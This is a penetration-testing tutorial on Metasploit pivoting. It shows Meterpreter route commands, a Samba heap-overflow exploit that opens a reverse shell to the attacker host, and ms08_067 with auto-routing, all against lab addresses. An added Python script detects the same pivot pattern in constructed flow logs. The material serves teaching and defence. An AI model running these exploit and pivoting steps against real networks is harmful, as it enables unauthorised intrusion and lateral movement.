Pivoting is a Meterpreter method that allows for the attack of other systems on a network through the Meterpreter console. For example, if an attacker were to compromise one system, he could use pivoting to compromise other systems on the same network or to access systems to which he could not otherwise route traffic, for whatever reason.
For example, suppose you’re performing a penetration test from the Internet. You compromise a system through a vulnerability and have a Meterpreter console to the internal network. You can’t directly access other systems on the network, because the system you compromised did not provide you with everything you need to do so, but you need to penetrate the network further. Pivoting will allow you to attack multiple systems on the internal network through the Internet, using the Meterpreter console.
In the following example, we'll attack a system on one subnet and then route through that system to attack another. First, we'll exploit the Windows XP machine, and then we'll piggyback the attack from our attacking machine to an Ubuntu system on the internal network. We'll come from a 10.10.1.1/24 address and attack systems within the 192.168.33.1/24 network.
We’ll assume that we already have access to one server via a compromise and will focus on establishing a connection to that network. Next, we introduce external scripts written with Meterpreter that can be found in the scripts/meterpreter/ directory. These scripts offer additional functionality that we can use within Meterpreter.
We begin by displaying the local subnets of the compromised system from within the Meterpreter session with run get_local_subnets:
[*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1075)

meterpreter > run get_local_subnets
Local subnet: 192.168.33.0/255.255.255.0

meterpreter > background

msf exploit(handler) > route add 192.168.33.0 255.255.255.0 1
msf exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.33.0       255.255.255.0      Session 1
We have successfully compromised our Windows XP machine and have full access to it. Next, we background the running session and add a route to the Framework with route add, telling it to send traffic for the remote network ID over session 1, the backgrounded Meterpreter session. We then display the active routes with route print, and the routing table shows that, just as we wanted, the route is active.
Next, we’ll set up a second exploit against the targeted Linux system. The specific exploit here is a Samba-based heap overflow, which would be vulnerable on our Metasploitable machine.
msf exploit(handler) > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(lsa_transnames_heap) > set LHOST 10.10.1.129
LHOST => 10.10.1.129
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.33.132
RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:47:e6:79
          inet addr:10.10.1.129  Bcast:10.10.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe47:e679/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:23656 errors:0 dropped:0 overruns:0 frame:0
          TX packets:32321 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4272582 (4.2 MB)  TX bytes:17849775 (17.8 MB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:600 errors:0 dropped:0 overruns:0 frame:0
          TX packets:600 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:41386 (41.3 KB)  TX bytes:41386 (41.3 KB)

msf exploit(lsa_transnames_heap) > exploit

[*] Started reverse handler on 10.10.1.129:8080
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe411...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe412...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[lsarpc] ...
[*] Calling the vulnerable function...
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (10.10.1.129:8080 -> 192.168.33.132:1608)
Compare the LHOST and RHOST variables to the network information displayed by ifconfig. Our LHOST option specifies the IP address of our attacking machine. Also notice that the RHOST option is set to an address on a different subnet: we are attacking systems by tunneling our traffic through the compromised target to additional systems on the target's network. We are leveraging the pivoting feature of Metasploit to pass communications through our exploited machine to the target machine that resides on the local subnet. In this case, if the heap overflow is successful, we should be presented with a reverse shell from 192.168.33.132, simply by leveraging the network access of the already compromised machine. When we run the exploit with exploit, the final line of output shows that a connection is set up, as expected, from a different machine, not the Windows XP one. To port scan through the pivot, we would use the scanner/portscan/tcp scanner module, which is built to handle routing through Metasploit.
You could also use the scanner/portscan/tcp scanner to conduct a series of port scans through your compromised target on the local subnet itself. We won’t go into the details here, but just know that you can perform port scanning on a compromised network leveraging this module.
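From the defender's side, the chain just described leaves a recognizable footprint in connection logs: the first compromised host holds an outbound connection to an outside address, then starts initiating SMB connections to internal peers, and a peer it touched later calls out to that same outside address (the second reverse shell). The following script, an added example that is not from the book or from Metasploit, flags hosts that match that sequence in a set of constructed flow records. The Flow record layout, the monitored subnet, the time window and the port list are assumptions for the example.

```python
"""Pivot-pattern detection over flow records (added example, not from the book).

Flags an internal host that (1) opened a connection to an address outside the
monitored subnet and (2) afterwards initiated SMB connections to internal peers,
and reports which of those peers later connected out to the same outside address.
The record format, subnet and thresholds are assumptions for this example."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Ports the pivoted Samba attack above travels over (SMB / MSRPC over SMB).
LATERAL_PORTS = {139, 445}


@dataclass(frozen=True)
class Flow:
    ts: int       # seconds since epoch (constructed values below)
    src: str      # initiating address
    dst: str      # responding address
    dport: int    # destination port


def find_pivots(flows, monitored="192.168.33.0/24", window=3600):
    """Return one finding per internal host that called out of `monitored` and,
    within `window` seconds, began initiating SMB connections to internal peers.
    Each finding lists the peers contacted and which of them later called out to
    one of the same external addresses (the fan-out a second reverse shell makes)."""
    net = ip_network(monitored)

    def inside(addr):
        return ip_address(addr) in net

    first_out = {}                  # host -> {external addr: first ts seen}
    lateral = defaultdict(dict)     # host -> {internal peer: first SMB ts seen}

    # Process in time order so an SMB flow only counts if the outbound
    # connection from the same host was already present.
    for f in sorted(flows, key=lambda f: f.ts):
        if inside(f.src) and not inside(f.dst):
            first_out.setdefault(f.src, {}).setdefault(f.dst, f.ts)
        elif (inside(f.src) and inside(f.dst) and f.dport in LATERAL_PORTS
              and f.src in first_out
              and any(f.ts - t <= window for t in first_out[f.src].values())):
            lateral[f.src].setdefault(f.dst, f.ts)

    findings = []
    for host, peers in lateral.items():
        external = first_out[host]
        # A peer "follows" if it connected out to one of the pivot's external
        # addresses at or after the moment the pivot first reached it over SMB.
        followers = sorted(
            p for p, t_lat in peers.items()
            if p in first_out
            and any(first_out[p].get(e, -1) >= t_lat for e in external))
        findings.append({
            "pivot": host,
            "external": sorted(external),
            "lateral_targets": sorted(peers),
            "peers_calling_out": followers,
        })
    return findings


# Constructed flow records mirroring the session above (not real capture data).
SAMPLE_FLOWS = [
    Flow(100, "192.168.33.130", "10.10.1.129", 443),      # reverse Meterpreter
    Flow(130, "192.168.33.130", "192.168.33.132", 445),   # pivoted SMB traffic
    Flow(131, "192.168.33.130", "192.168.33.132", 445),
    Flow(145, "192.168.33.132", "10.10.1.129", 8080),     # second reverse shell
    Flow(200, "192.168.33.140", "192.168.33.10", 445),    # routine file-share access
    Flow(210, "192.168.33.140", "10.10.1.50", 443),       # routine outbound web
]

if __name__ == "__main__":
    for finding in find_pivots(SAMPLE_FLOWS):
        print(finding)
```

Run against the sample, the only finding is 192.168.33.130 as the pivot, 192.168.33.132 as its lateral target, and 192.168.33.132 calling out to 10.10.1.129 afterwards; host 192.168.33.140 is not flagged because its SMB traffic precedes any outbound connection. The ordering requirement is what keeps ordinary file-share use from tripping the rule, so on a real network the window and port list should be tuned to the environment's normal traffic.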
In the preceding examples, we used the route add command after we had compromised the system. Alternatively, to add routes to Meterpreter automatically whenever a new session spawns, we could use load auto_add_route:
msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.1.129:443
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1090)
[*] AutoAddRoute: Routing new subnet 192.168.33.0/255.255.255.0 through session 1